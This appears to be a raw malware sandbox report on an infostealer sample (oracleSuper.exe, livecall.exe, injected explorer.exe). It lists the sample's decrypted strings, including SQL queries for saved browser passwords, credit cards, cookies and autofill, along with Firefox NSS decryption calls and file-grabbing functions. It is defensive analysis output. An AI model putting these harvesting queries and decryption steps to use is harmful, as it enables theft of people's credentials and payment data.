Source: 9.2.explorer.exe.420000.0.unpack String decryptor: usernameField
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: usernameField
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formSubmitURL
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: formSubmitURL
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: logins.json
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: logins.json
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Web Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Web Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login Data
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Card:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Card:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Year:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Year:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Month:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Month:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Name:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Name:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: History
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Autofill
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: FALSE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: FALSE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: TRUE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: TRUE
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: .txt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Cookies
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Network
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Network
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OperaGX
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: OperaGX
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Opera
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Password:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Login:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Host:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Host:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profile:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: profile:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: Soft:
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_Authenticate
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_Authenticate
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_FreeSlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_FreeSlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Shutdown
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Shutdown
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Init
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: NSS_Init
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PATH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PATH
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encrypted_key
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: encrypted_key
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_blob
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_blob
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_bytes
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_bytes
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_close
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_close
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_finalize
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_finalize
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_text
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_column_text
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_step
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_step
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: sqlite3_open
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmEndSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmEndSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmGetList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmGetList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmRegisterResources
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmRegisterResources
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmStartSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RmStartSession
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetModuleFileNameExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetModuleFileNameExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PathMatchSpecA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: PathMatchSpecA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrStrA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrStrA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: StrCmpCA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCrackUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCrackUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetReadFile
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetReadFile
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpOpenRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpOpenRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpSendRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: HttpSendRequestA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetCloseHandle
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetConnectA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetConnectA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: InternetOpenUrlA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ShellExecuteExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: ShellExecuteExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SHGetFolderPathA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: SHGetFolderPathA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptUnprotectData
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptUnprotectData
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptBinaryToStringA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CryptBinaryToStringA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumValueA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumValueA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegCloseKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegCloseKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegOpenKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegOpenKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegEnumKeyExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegQueryValueExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: RegQueryValueExA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CharToOemW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CharToOemW
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: wsprintfA
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CloseWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDC
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDesktopWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetDesktopWindow
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetWindowRect
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: GetWindowRect
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDestroyKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDestroyKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptSetProperty
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptSetProperty
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDecrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptDecrypt
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoCreateInstance
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoCreateInstance
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoInitialize
Source: 9.2.explorer.exe.420000.0.unpack String decryptor: CoInitialize
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00426275 SysStringLen,CryptProtectData,SysAllocStringByteLen,memset,memcpy,LocalFree, 2_2_00426275
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_00426315 SysStringByteLen,CryptUnprotectData,SysAllocStringLen,memset,memcpy,LocalFree, 2_2_00426315
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_004263BD CryptProtectData, 2_2_004263BD
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe Code function: 2_2_0042642E CryptUnprotectData, 2_2_0042642E
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0F4B CryptDestroyKey,LocalFree, 3_2_275A0F4B
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0F70 CryptDestroyHash, 3_2_275A0F70
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27563F20 CryptDecrypt, 3_2_27563F20
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DFC0 __time64,__time64,CryptContextAddRef, 3_2_2754DFC0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759DF90 CryptVerifyMessageSignature,CryptVerifyMessageSignature,GetLastError,CryptVerifyMessageSignature, 3_2_2759DF90
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A07A0 CryptDestroyHash,CryptDestroyKey, 3_2_275A07A0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759EEC0 CertDuplicateCertificateContext,_memset,__time64,_memset,CryptSignMessage,GetLastError,CryptSignMessage, 3_2_2759EEC0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A06C0 CryptDuplicateKey,GetLastError,GetLastError,GetLastError,GetLastError,CryptSetKeyParam,CryptCreateHash, 3_2_275A06C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27548680 CryptDecrypt,CryptDecrypt,GetLastError,CryptDecrypt,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_27548680
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753DD40 EncryptWithSessionKey,InterlockedDecrement, 3_2_2753DD40
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0570 CryptSetKeyParam, 3_2_275A0570
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A0D00 CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptGetKeyParam,CryptDestroyKey,CryptGetKeyParam,CryptGetKeyParam,LocalAlloc,CryptGenRandom,CryptImportKey, 3_2_275A0D00
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ED20 CryptGetHashParam, 3_2_2754ED20
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275525E0 __time64,__time64,CryptDestroyKey,CryptDestroyKey,CryptCreateHash,_memset,InternetCrackUrlW,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275525E0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275485B0 CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275485B0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A05A0 CryptContextAddRef,lstrlenA,lstrlenA, 3_2_275A05A0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27593C50 CryptDestroyHash, 3_2_27593C50
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759F450 CryptDestroyKey,CryptProtectData, 3_2_2759F450
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27538C40 CryptDestroyKey, 3_2_27538C40
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A14C0 _memset,GetVersionExW,GetLastError,GetLastError,GetLastError,GetLastError,CryptImportKey, 3_2_275A14C0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DCF0 CryptDestroyKey,CryptDuplicateKey,CryptDestroyKey,CryptDuplicateKey, 3_2_2754DCF0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A04F0 CryptEncrypt, 3_2_275A04F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ECE0 CryptGetHashParam, 3_2_2754ECE0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754DC90 CryptReleaseContext,CryptContextAddRef, 3_2_2754DC90
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754EC80 CryptHashData, 3_2_2754EC80
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2754ECB0 CryptSetHashParam, 3_2_2754ECB0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A04B0 CryptEncrypt, 3_2_275A04B0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2759F310 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash, 3_2_2759F310
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275533F0 __time64,CryptCreateHash,_memset,InternetCrackUrlW,GetLastError,GetLastError,GetLastError,GetLastError,CryptDestroyHash, 3_2_275533F0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A13E0 GetLastError,GetLastError,GetLastError,CryptDestroyKey,GetLastError, 3_2_275A13E0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27539A70 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 3_2_27539A70
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1220 CryptGenKey,CryptExportKey,CryptExportKey,CryptExportKey,CryptImportKey,SetLastError,CryptDestroyKey, 3_2_275A1220
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A1AF0 LocalAlloc,__CxxThrowException@8,CryptCreateHash,CryptCreateHash,CryptCreateHash,LocalFree,CryptDestroyKey,CryptDestroyHash, 3_2_275A1AF0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753D140 CryptReleaseContext,LocalFree, 3_2_2753D140
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_27579910 CryptReleaseContext,CryptAcquireContextW,CryptReleaseContext, 3_2_27579910
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753E1D0 DecryptWithSessionKey,InterlockedDecrement, 3_2_2753E1D0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A09D0 CryptDuplicateKey,GetLastError,GetLastError,GetLastError,GetLastError,CryptDestroyKey,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,CryptDestroyKey,GetLastError,CryptGenRandom,CryptGetHashParam, 3_2_275A09D0
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A2040 __CxxThrowException@8,CryptAcquireContextA,GetLastError,GetLastError,GetLastError,GetLastError,__CxxThrowException@8,InterlockedDecrement,SetEvent,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,GetLastError,_memset,CryptGenRandom,GetLastError,GetLastError,GetLastError,GetLastError, 3_2_275A2040
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_2753B870 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext, 3_2_2753B870
Source: C:\Users\user\AppData\Roaming\localTask_v2\livecall.exe Code function: 3_2_275A18D0 InterlockedDecrement,SetEvent,CryptGetProvParam,CryptGenKey,CryptGetKeyParam,CryptDestroyKey,_memset,CryptDestroyKey, 3_2_275A18D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0043302D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 9_2_0043302D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00427DC2 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 9_2_00427DC2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00427E41 CryptUnprotectData,LocalAlloc,LocalFree, 9_2_00427E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042AB80 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA, 9_2_0042AB80
Source: oracleSuper.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\localTask_v2\livecall.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49916 version: TLS 1.2
Source: oracleSuper.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdb source: oracleSuper.exe
Source: Binary string: wntdll.pdb source: oracleSuper.exe, 00000000.00000002.2192439487.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2192732992.0000000003E92000.00000004.00000001.00020000.00000000.sdmp, oracleSuper.exe, 00000000.00000002.2191941536.0000000003787000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171386304.000000000287E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171686522.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196426125.0000000002F65000.00000004.00000001.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195892526.000000000285E000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2196118649.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407126483.0000000005060000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2406823080.0000000004C17000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541837942.000000000B900000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541001928.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msidcrl40.pdb source: livecall.exe, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: msidcrl40.pdbL source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171954674.0000000027501000.00000020.00000001.01000000.00000008.sdmp, livecall.exe, 00000003.00000002.2196853032.0000000027501000.00000020.00000001.01000000.0000000A.sdmp, msidcrl40.dll.0.dr, msidcrl40.dll.2.dr
Source: Binary string: livecall.pdb source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: livecall.pdbl source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr
Source: Binary string: H:\source\source.SAM\202788\Release_wdexe_9\WX\Desktop_x86_32_VS2019\Release\WDExe.pdbi source: oracleSuper.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_00421443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_00421443
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042E016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042C039 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_0042C039
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_004378FC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 9_2_004378FC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0042BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 9_2_0042BC98
